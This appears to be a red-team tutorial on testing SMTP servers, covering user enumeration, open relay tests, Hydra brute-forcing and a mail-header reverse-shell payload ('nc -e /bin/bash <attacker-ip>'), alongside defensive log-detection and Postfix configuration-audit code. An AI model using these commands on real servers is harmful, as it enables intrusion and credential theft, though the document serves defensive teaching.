
SMTP Pentest Notes - Port 25

Pivoting for Red Teamers

SMTP Pentesting Notes

SMTP (Simple Mail Transfer Protocol) is a key component of email communication. Misconfigured SMTP servers can be vulnerable to attacks such as enumeration, open relay abuse, and authentication bypass.

Step 1: Enumerate the SMTP Server

Connect to the SMTP server using Telnet:

telnet <target-ip> 25

Look for the server banner (the 220 greeting line), which may reveal the mail software, its version and details of its configuration.

Step 2: User Enumeration with VRFY & EXPN

Check if the server allows user verification:

VRFY admin
EXPN postmaster

If the server answers these with a positive reply instead of rejecting the command, it is disclosing which user accounts exist, which could aid brute-force attacks.

Step 3: Open Relay Testing

To check if the server allows unauthenticated email forwarding:

MAIL FROM:<attacker@example.com>
RCPT TO:<victim@example.com>
DATA
Subject: Open Relay Test

This is a test message.
.

If the email is delivered successfully, the server is an open relay and can be exploited for spam or phishing attacks.

Step 4: Brute-Forcing SMTP Authentication

Use Hydra to attempt brute-force login:

hydra -L users.txt -P passwords.txt smtp://<target-ip> -s 25

If credentials are found, they may be used for unauthorized email access or further exploitation.
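From the defender's side, the relay test in Step 3 and the Hydra run in Step 4 leave a recognisable trail in the mail server's log. The following added example (not from the original post) runs simple detection logic over constructed Postfix smtpd log lines in the real format Postfix uses for relay denials and SASL authentication failures; the IP addresses, timestamps and threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample Postfix smtpd log lines (not from the original post), in the
# format Postfix uses for "Relay access denied" and SASL authentication failures.
SAMPLE_LOG = """\
Mar  1 10:00:01 mail postfix/smtpd[2231]: connect from unknown[203.0.113.5]
Mar  1 10:00:02 mail postfix/smtpd[2231]: NOQUEUE: reject: RCPT from unknown[203.0.113.5]: 554 5.7.1 <victim@example.com>: Relay access denied; from=<attacker@example.com> to=<victim@example.com> proto=ESMTP helo=<probe>
Mar  1 10:00:05 mail postfix/smtpd[2231]: warning: unknown[203.0.113.5]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
Mar  1 10:00:06 mail postfix/smtpd[2231]: warning: unknown[203.0.113.5]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
Mar  1 10:00:07 mail postfix/smtpd[2231]: warning: unknown[203.0.113.5]: SASL PLAIN authentication failed: authentication failure
Mar  1 10:00:09 mail postfix/smtpd[2240]: warning: unknown[198.51.100.9]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
Mar  1 10:00:10 mail postfix/smtpd[2240]: disconnect from unknown[198.51.100.9]
"""

# A rejected RCPT for a domain we are not responsible for (554 reject / 454 defer).
RELAY_RE = re.compile(r"RCPT from \S+\[(?P<ip>[^\]]+)\]: (?:4|5)\d\d \S+ <[^>]*>: Relay access denied")
# One failed SMTP AUTH attempt, whatever SASL mechanism the client tried.
AUTH_RE = re.compile(r"warning: \S+\[(?P<ip>[^\]]+)\]: SASL \w+ authentication failed")

def summarise(log_text):
    """Count relay-denial and auth-failure events per client IP."""
    stats = defaultdict(lambda: {"relay_denied": 0, "auth_failed": 0})
    for line in log_text.splitlines():
        m = RELAY_RE.search(line)
        if m:
            stats[m["ip"]]["relay_denied"] += 1
            continue
        m = AUTH_RE.search(line)
        if m:
            stats[m["ip"]]["auth_failed"] += 1
    return dict(stats)

def flag_suspicious(stats, auth_threshold=3):
    """Return IPs that probed for an open relay or crossed the auth-failure threshold."""
    flagged = {}
    for ip, s in stats.items():
        reasons = []
        if s["relay_denied"]:
            reasons.append("open-relay probe")
        if s["auth_failed"] >= auth_threshold:
            reasons.append(f"{s['auth_failed']} failed SMTP AUTH attempts")
        if reasons:
            flagged[ip] = reasons
    return flagged

if __name__ == "__main__":
    for ip, reasons in flag_suspicious(summarise(SAMPLE_LOG)).items():
        print(ip, "->", "; ".join(reasons))
```

On a live system the same two expressions can be fed from `journalctl -u postfix` or /var/log/mail.log; the threshold should be tuned to how often legitimate clients mistype passwords.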

Step 5: Finding SMTP Vulnerabilities

Check the server banner for version details:

220 mail.example.com ESMTP Postfix 2.9.6

Search for known vulnerabilities:

searchsploit postfix

Refer to databases such as:

Step 6: Privilege Escalation via Misconfigured Mail Scripts

If the SMTP server interacts with external scripts, it may be possible to execute commands remotely:

From: "|/bin/bash -c 'nc -e /bin/bash <attacker-ip> 4444'"
To: admin@example.com
Subject: Exploit Test

If vulnerable, this could lead to Remote Code Execution (RCE).

Mitigation Recommendations

  • Disable VRFY & EXPN to prevent user enumeration.
  • Require authentication to prevent unauthorized access.
  • Close open relays to block email abuse.
  • Enable logging & monitoring to detect suspicious activity.
  • Keep software updated to mitigate known vulnerabilities.
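Because the banner in Step 5 shows Postfix, the following added example (not from the original post) turns the first three recommendations into a check against Postfix's main.cf. It audits a weak configuration fragment beside a hardened one; the parameter names are real Postfix settings, the values and hostnames are constructed.

```python
import re
# Constructed main.cf fragments (not from the original post): weak beside hardened.
WEAK_MAIN_CF = """\
myhostname = mail.example.com
smtpd_banner = $myhostname ESMTP $mail_name ($mail_version)
mynetworks = 0.0.0.0/0
smtpd_relay_restrictions = permit_mynetworks, permit_sasl_authenticated
smtpd_sasl_auth_enable = no
"""
HARDENED_MAIN_CF = """\
myhostname = mail.example.com
smtpd_banner = $myhostname ESMTP
disable_vrfy_command = yes
mynetworks = 127.0.0.0/8 [::1]/128
smtpd_relay_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_unauth_destination
smtpd_sasl_auth_enable = yes
smtpd_tls_auth_only = yes
"""

def parse_main_cf(text):
    """Parse 'key = value' lines into a dict; comments and blank lines are skipped."""
    params = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        params[key.strip()] = value.strip()
    return params

def audit_main_cf(text):
    """Return findings matching the VRFY, authentication, relay and banner recommendations."""
    p = parse_main_cf(text)
    findings = []
    if p.get("disable_vrfy_command", "no").lower() != "yes":
        findings.append("VRFY enabled: set disable_vrfy_command = yes")
    if "$mail_version" in p.get("smtpd_banner", ""):
        findings.append("banner discloses version: drop $mail_version from smtpd_banner")
    # Postfix 2.10+ defaults to a safe value when unset; only an explicit override is flagged.
    relay = p.get("smtpd_relay_restrictions")
    if relay is not None and not re.search(r"\b(reject|defer)_unauth_destination\b", relay):
        findings.append("relay restrictions lack reject_unauth_destination (open relay)")
    if re.search(r"(^|[\s,])0\.0\.0\.0/0($|[\s,])", p.get("mynetworks", "")):
        findings.append("mynetworks trusts every address: relay open to the internet")
    if p.get("smtpd_sasl_auth_enable", "no").lower() != "yes":
        findings.append("no SMTP AUTH: remote senders can only be trusted via mynetworks")
    elif p.get("smtpd_tls_auth_only", "no").lower() != "yes":
        findings.append("AUTH accepted without TLS: set smtpd_tls_auth_only = yes")
    return findings
```

Run it against `postconf -n` output to audit the live, non-default settings of a real server.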

Conclusion

SMTP servers can be an attacker's entry point if not properly secured. Understanding and testing for vulnerabilities ensures a more secure email infrastructure.
